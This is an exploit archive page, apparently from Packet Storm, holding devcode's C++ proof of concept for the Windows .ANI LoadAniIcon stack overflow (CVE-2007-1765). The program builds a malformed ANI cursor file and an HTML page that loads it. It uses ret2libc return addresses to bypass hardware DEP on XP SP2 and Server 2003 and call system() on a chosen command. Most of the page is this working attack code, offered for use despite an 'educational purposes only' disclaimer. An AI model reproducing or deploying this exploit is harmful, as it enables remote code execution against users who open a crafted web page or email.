what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

devcode2.txt

devcode2.txt
Posted Apr 5, 2007
Authored by devcode

Exploit for the Microsoft Windows .ANI LoadAniIcon stack overflow vulnerability. (Hardware DEP).

tags | exploit, overflow
systems | windows
advisories | CVE-2007-1765
SHA-256 | 712fe1c2ff48b375d86ed79e79a516acf08a26ac10ba886752f4ca552ec005a2

devcode2.txt

Change Mirror Download
/*
* version 0.5
* Copyright (c) 2007 devcode
*
*
* ^^ D E V C O D E ^^
*
* Windows .ANI LoadAniIcon Stack Overflow For Hardware DEP XP SP2
* [CVE-2007-1765]
*
*
* Description:
* A vulnerability has been identified in Microsoft Windows,
* which could be exploited by remote attackers to take complete
* control of an affected system. This issue is due to a stack overflow
* error within the "LoadAniIcon()" [user32.dll] function when rendering
* cursors, animated cursors or icons with a malformed header, which could
* be exploited by remote attackers to execute arbitrary commands by
* tricking a user into visiting a malicious web page or viewing an email
* message containing a specially crafted ANI file.
*
* Hotfix/Patch:
* None as of this time.
*
* Vulnerable systems:
* Microsoft Windows 2000 Service Pack 4
* Microsoft Windows XP Service Pack 2
* Microsoft Windows XP 64-Bit Edition version 2003 (Itanium)
* Microsoft Windows XP Professional x64 Edition
* Microsoft Windows Server 2003
* Microsoft Windows Server 2003 (Itanium)
* Microsoft Windows Server 2003 Service Pack 1
* Microsoft Windows Server 2003 Service Pack 1 (Itanium)
* Microsoft Windows Server 2003 x64 Edition
* Microsoft Windows Vista
*
* Microsoft Internet Explorer 6
* Microsoft Internet Explorer 7
*
* Tested on:
* Microsoft XP SP2 + DEP + Internet Explorer 6
*
* This is a PoC and was created for educational purposes only. The
* author is not held responsible if this PoC does not work or is
* used for any other purposes than the one stated above.
*
* Credit goes to HOD (if he/they exist :P) for the html. Works on
* XP SP2 with Hardware DEP enabled, go figure.
*
* ^^ shoutz to Wonk(if he exists r0fl), InTeL, thrasher :)
*
*
*/
#include <iostream>
#include <windows.h>

/* ANI Header */
unsigned char uszAniHeader[] =
"\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68"
"\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00"
"\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02"
"\x61\x6E\x69\x68\xA8\x03\x00\x00";

/* system("calc.exe"); */
char szExecute[] = "logoff.exe\x00";

unsigned char uszHtml[] =
"<html>"
"Microsoft Windows .ANI LoadAniIcon Exploit"
"<br>Copyright (c) 2007 devcode<br>"
"<style>" \
"* {CURSOR: url(\"poc.ani\")}</style></head>"
"</html>";

/* Usage: ani.exe 1*/
char szIntro[] =
"\n\t\tWindows .ANI LoadAniIcon Stack Overflow\n"
"\t\t\tdevcode (c) 2007\n"
"[+] Targets:\n"
"\t(0) Kernel32.dll (ExitProcess)\n"
"\t(1) Windows XP SP2 + DEP\n"
"\t(2) Windows 2003 Server\n"
"Usage: ani.exe <target>";

/* RET2LIBC attack */
typedef struct {
const char *szTarget;
/* kernel32.dll - set the proper stack frame
LEA EBP, DWORD PTR SS:[ESP+10]
SUB ESP, EAX
PUSH EBX
PUSH ESI
PUSH EDI
....
....
RETN
*/
unsigned char uszRet[5];
/* msvcrt.dll - system() */
unsigned char uszMsvcrtCall[5];
} TARGET;

TARGET targets[] = {
{ "Kernel32.dll (ExitProcess)", "\x90\x90\x90\x90", "\x90\x90\x90\x90" },
{ "Windows XP SP2", "\xD6\x24\x80\x7C", "\xC7\x93\xC2\x77" },
{ "Windows 2003 Server", "\x0A\x17\xE4\x77", "\x10\x8C\xBB\x77" }
};

int main( int argc, char **argv ) {
char szBuffer[1024];
FILE *f;
void *pExitProcess[4];

if ( argc < 2 ) {
printf("%s\n", szIntro );
return 0;
}

if ( atoi( argv[1] ) == 0 ) {
printf("[+] Getting ExitProcess address...\n");
*pExitProcess = GetProcAddress( GetModuleHandle( "kernel32.dll" ),
"ExitProcess" );
if ( pExitProcess == NULL ) {
printf("[-] Cannot get ExitProcess address\n");
return 0;
}
memcpy( targets[1].uszRet, pExitProcess, 4 );
}

printf("[+] Creating ANI header...\n");
memset( szBuffer, 0x90, sizeof( szBuffer ) );
memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 );

printf("[+] Copying execution code...\n");
memcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 );
memset( szBuffer + 136, 0, 4 );
memset( szBuffer + 204, 0, 4 );
szBuffer[136] = 0x6C;
szBuffer[204] = 0x6C;
memcpy( szBuffer + 196, targets[atoi(argv[1])].uszMsvcrtCall, 4 );
memcpy( szBuffer + 200, targets[atoi(argv[1])].uszMsvcrtCall, 4 );
memcpy( szBuffer + 240, szExecute, sizeof( szExecute ) - 1 );

f = fopen( "poc.ani", "wb" );
if ( f == NULL ) {
printf("[-] Cannot create ani file\n");
return 0;
}

fwrite( szBuffer, 1, 1024, f );
fclose( f );
printf("[+] .ANI file succesfully created!\n");

f = fopen( "poc.html", "wb" );
if ( f == NULL ) {
printf("[-] Cannot create html file\n");
return 0;
}

fwrite( uszHtml, 1, sizeof( uszHtml ), f );
fclose( f );
printf("[+] HTML file succesfully created!\n");

return 0;
}

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close